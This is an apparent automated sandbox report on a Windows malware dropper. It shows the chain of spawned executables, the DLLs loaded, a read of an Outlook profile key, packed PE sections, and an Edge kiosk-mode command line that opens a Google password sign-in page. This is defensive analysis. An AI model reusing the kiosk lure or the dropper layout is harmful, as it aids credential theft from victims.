Source: file.exe Virustotal: Detection: 56%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: eb98fe5174.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe "C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe "C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe "C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe"
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2064,i,2067255111273932546,8949113653420219710,262144 --disable-features=TranslateUI /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2616 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4612 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7040 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6416 --field-trial-handle=1980,i,18313026722689796995,6821314584092164517,262144 --disable-features=TranslateUI /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3056 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4132 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6108 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:8
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1160,i,17042684596641100279,13993029759771197311,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=2064,i,2036512315538271588,12735040485945945240,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe "C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe "C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe "C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3056 --field-trial-handle=2840,i,12003501403383072226,2430536015777904389,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2064,i,2067255111273932546,8949113653420219710,262144 --disable-features=TranslateUI /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1909248 > 1048576
Source: file.exe Static PE information: Raw size of gmovqjaa is bigger than: 0x100000 < 0x1a0a00
Source: Binary string: mozglue.pdbP source: eb98fe5174.exe, 00000007.00000002.2669122689.000000006C94D000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.7.dr, mozglue[1].dll.7.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.7.dr, freebl3[1].dll.7.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.7.dr, freebl3[1].dll.7.dr
Source: Binary string: nss3.pdb@ source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.7.dr, softokn3.dll.7.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.7.dr, vcruntime140[1].dll.7.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.7.dr, msvcp140[1].dll.7.dr
Source: Binary string: nss3.pdb source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr
Source: Binary string: mozglue.pdb source: eb98fe5174.exe, 00000007.00000002.2669122689.000000006C94D000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.7.dr, mozglue[1].dll.7.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.7.dr, softokn3.dll.7.dr

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 1.2.explorti.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 2.2.explorti.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 6.2.explorti.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gmovqjaa:EW;bqoswyio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Unpacked PE file: 7.2.eb98fe5174.exe.660000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Unpacked PE file: 8.2.53c7d901f1.exe.490000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ylafldxq:EW;tgmwlthu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8D3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 7_2_6C8D3480
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1b4fd3 should be: 0x1b1c60
Source: 53c7d901f1.exe.6.dr Static PE information: real checksum: 0x1b4fd3 should be: 0x1b1c60
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1df7dc should be: 0x1dd49d
Source: eb98fe5174.exe.6.dr Static PE information: real checksum: 0x1b4fd3 should be: 0x1b1c60
Source: file.exe Static PE information: real checksum: 0x1df7dc should be: 0x1dd49d
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: gmovqjaa
Source: file.exe Static PE information: section name: bqoswyio
Source: file.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: gmovqjaa
Source: explorti.exe.0.dr Static PE information: section name: bqoswyio
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: ylafldxq
Source: random[1].exe.6.dr Static PE information: section name: tgmwlthu
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: eb98fe5174.exe.6.dr Static PE information: section name:
Source: eb98fe5174.exe.6.dr Static PE information: section name: .rsrc
Source: eb98fe5174.exe.6.dr Static PE information: section name: .idata
Source: eb98fe5174.exe.6.dr Static PE information: section name:
Source: eb98fe5174.exe.6.dr Static PE information: section name: ylafldxq
Source: eb98fe5174.exe.6.dr Static PE information: section name: tgmwlthu
